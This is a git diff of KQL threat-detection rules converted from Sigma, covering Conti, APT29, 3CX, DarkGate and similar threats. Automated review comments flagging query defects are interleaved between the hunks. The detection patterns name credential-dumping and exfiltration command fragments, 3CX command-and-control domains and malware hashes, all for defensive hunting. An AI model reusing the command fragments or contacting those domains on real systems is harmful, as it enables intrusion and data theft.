diff --git a/Initial Access/Terminal_Service_Process_Spawn.kql b/Initial Access/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Initial Access/Terminal_Service_Process_Spawn.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Initial Access/Unusual_Child_Process_of_dns.exe.kql b/Initial Access/Unusual_Child_Process_of_dns.exe.kql
deleted file mode 100644
index 3866f302..00000000
--- a/Initial Access/Unusual_Child_Process_of_dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql b/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql
deleted file mode 100644
index 5cd09102..00000000
--- a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Modification_by_dns.exe.kql b/Initial Access/Unusual_File_Modification_by_dns.exe.kql
deleted file mode 100644
index 1c228bcf..00000000
--- a/Initial Access/Unusual_File_Modification_by_dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Windows_Registry_Trust_Record_Modification.kql b/Initial Access/Windows_Registry_Trust_Record_Modification.kql
deleted file mode 100644
index 614be3d0..00000000
--- a/Initial Access/Windows_Registry_Trust_Record_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb, Trent Liffick (@tliffick)
-// Date: 2020/02/19
-// Level: medium
-// Description: Alerts on trust record modification within the registry, indicating usage of macros
-// Tags: attack.initial_access, attack.t1566.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql
new file mode 100644
index 00000000..a3ff5e5f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql
@@ -0,0 +1,12 @@
+// Title: APT31 Judgement Panda Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql
new file mode 100644
index 00000000..8296109c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql
@@ -0,0 +1,10 @@
+// Title: Conti NTDS Exfiltration Command
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to exfiltrate NTDS
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
new file mode 100644
index 00000000..da60e4e6
--- /dev/null
+++ b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
+// Author: frack113
+// Date: 2021-08-16
+// Level: high
+// Description: Detects a command used by conti to dump database
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..bb9424a1
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
@@ -0,0 +1,14 @@
+// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: medium
+// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
+This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
+process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
+processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
new file mode 100644
index 00000000..e0507dbe
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: Pandemic Registry Key
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-01
+// Level: critical
+// Description: Detects Pandemic Windows Implant
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance"
\ No newline at end of file
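Review bot: The wrapped Description lines in the DarkGate hunk (`This activity has been associated…`, `process injection and connects…`, `processes consitute…`) are emitted without the `//` prefix, so they are not comments: pasted into a KQL editor they are parsed as query text ahead of `DeviceFileEvents`, and the query does not run. The CVE-2025-33053 image-load rule and the Pikabot rule in later hunks have the same problem on their `by monitoring…`, `attacker-controlled…` and `The malware Pikabot…` lines. Each continuation line needs the prefix, e.g. `// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs`; since the commit message attributes these files to a conversion script, the fix presumably belongs in the script's header writer so every multi-line description is handled the same way. The typo `consitute` (constitute) is inherited from the source description and could be corrected in the same pass.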
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
new file mode 100644
index 00000000..7a9ee05c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
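Review bot: The whole match hinges on `RemoteUrl`, which in DeviceNetworkEvents is not filled in for every connection — it depends on a hostname being known for the destination — so a 3CXDesktopApp.exe connection that the sensor only recorded by IP produces an empty RemoteUrl and is silently missed even though the process filter holds. If that gap matters for this rule, the header should say so under `// False Positives:` (or rather as a known blind spot), e.g. `// Note: matches on RemoteUrl only; connections recorded without a hostname are not covered`, and a companion check on the DNS/IP side would be needed, which this page gives no data for. `contains` is also a substring test, so each literal matches any longer hostname containing it; that is the loose match the rule seems to intend, but `endswith` would tie it to the listed registrable domains if tighter matching is wanted.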
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
new file mode 100644
index 00000000..0a5e25ac
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
@@ -0,0 +1,11 @@
+// Title: Potential CSharp Streamer RAT Loading .NET Executable Image
+// Author: Luca Di Bartolomeo
+// Date: 2024-06-22
+// Level: high
+// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
new file mode 100644
index 00000000..e47bc5f3
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
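Review bot: `matches regex` in KQL is case-sensitive, so `"\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"` only fires when the recorded FolderPath carries exactly that casing for the AppData\Local\Temp segment, which is stricter than every other path test on this page (`contains`/`endswith` are case-insensitive). If the source rule intends the path to match regardless of casing, prefix the pattern: `| where FolderPath matches regex "(?i)\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"`, bearing in mind that `(?i)` also widens `[0-9A-Z]` to lowercase letters. Whether the original meant the case-sensitive form is not visible here, so this is worth confirming against it; the empty line left between the Description and MITRE Tactic headers in this hunk looks like an artefact of the same multi-line description handling seen elsewhere in the commit.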
@@ -0,0 +1,13 @@
+// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: high
+// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053
+by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
+attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
new file mode 100644
index 00000000..80fa7bfe
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
@@ -0,0 +1,14 @@
+// Title: Potential Pikabot C2 Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to an external network connection.
+The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
new file mode 100644
index 00000000..2f1ab35c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Suspicious Child Process Of 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql
new file mode 100644
index 00000000..e22882e2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql
@@ -0,0 +1,10 @@
+// Title: GALLIUM IOCs
+// Author: Tim Burrell
+// Date: 2020-02-07
+// Level: high
+// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats
+
+DeviceProcessEvents
+| where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith "178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith 
"63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql
new file mode 100644
index 00000000..5e586028
--- /dev/null
+++ b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Russian APT Credential Theft Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
new file mode 100644
index 00000000..03825d48
--- /dev/null
+++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit
+// Author: Gene Kazimiarovich
+// Date: 2025-04-20
+// Level: medium
+// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
+If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
+
+// MITRE Tactic: Credential Access
+// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054
+// False Positives:
+// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users)
+// - Custom corporate scripts that programmatically generate .library-ms Files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
new file mode 100644
index 00000000..d120fd91
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
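Review bot: The false-positive section names legitimate Library shortcuts under `%APPDATA%\Microsoft\Windows\Libraries\`, yet the `| where` line lets explorer.exe writing to exactly that folder through, so the one benign case the author anticipated is the one the rule will fire on most. If that location proves noisy, a targeted exclusion keeps the archiver-initiated cases intact: `and not (InitiatingProcessFolderPath endswith "\\explorer.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\")`. Whether to carry such tuning in the converted file or leave it to the deploying tenant is a policy question for this repository; at minimum the comment and the query should not contradict each other.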
@@ -0,0 +1,12 @@
+// Title: APT29 2018 Phishing Campaign CommandLine Indicators
+// Author: Florian Roth (Nextron Systems), @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql
new file mode 100644
index 00000000..c6dc5a5b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: APT29 2018 Phishing Campaign File Indicators
+// Author: @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
new file mode 100644
index 00000000..dc1d9e6f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
@@ -0,0 +1,12 @@
+// Title: APT PRIVATELOG Image Load Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-07
+// Level: high
+// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats
+// False Positives:
+// - Rarely observed
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql
new file mode 100644
index 00000000..f34a9bcb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql
@@ -0,0 +1,10 @@
+// Title: Blue Mockingbird - Registry
+// Author: Trent Liffick (@tliffick)
+// Date: 2020-05-14
+// Level: high
+// Description: Attempts to detect system changes made by Blue Mockingbird
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
new file mode 100644
index 00000000..abe0487c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
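Review bot: In the Blue Mockingbird rule, `RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"` can never match in DeviceRegistryEvents, because `ServiceDll` is a value name and the table reports it in `RegistryValueName`, not as the last element of `RegistryKey`; the Sysmon TargetObject the Sigma rule was written against folds key and value into one path. Split the two: `| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters" and RegistryValueName =~ "ServiceDll"`. Any other converted registry rule whose Sigma pattern ends in a value name has the same gap, so the converter should map the trailing path component of a Sigma registry TargetObject onto `RegistryValueName` when the source rule targets a value.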
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT DLL Sideloading Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
new file mode 100644
index 00000000..692bb84b
